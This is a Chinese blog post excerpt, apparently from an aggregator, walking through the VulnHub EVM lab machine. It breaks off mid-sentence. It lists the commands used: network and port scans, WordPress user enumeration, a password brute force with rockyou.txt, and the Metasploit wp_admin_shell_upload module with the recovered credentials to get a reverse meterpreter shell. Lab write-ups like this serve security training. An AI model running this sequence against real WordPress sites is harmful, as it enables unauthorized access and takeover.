今天看啥  ›  专栏  ›  云计算和网络安全技术实践

vulnhub之EVM的实践

云计算和网络安全技术实践  · 公众号  ·  · 2024-02-04 08:48
本周实践的是vulnhub的EVM镜像,这个靶机难度太大,基本都是参考的官方writeup,下载地址,https://download.vulnhub.com/evm/EVM.ova,用virtualbox导入成功,做地址扫描,sudo netdiscover -r 192.168.0.0/24,获取到靶机地址是192.168.0.173,接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.173,发现靶机有80端口的http服务,对http服务进行目录暴破,dirb http://192.168.0.173,发现靶机的http服务是wordpress,对wordpress进行账户扫描,wpscan --url http://192.168.0.173/wordpress --enumerate u,获取到账户c0rrupt3d_brain,继续对wordpress账户的密码进行暴破,wpscan --url http://192.168.0.173/wordpress -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt,获取到密码24992499,上metasploit,msfconsole,use exploit/unix/webapp/wp_admin_shell_uploadset rhosts 192.168.0.173set targeturi /wordpressset username c0rrupt3d_brainset password 24992499exploit拿到meterpreter反弹she ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照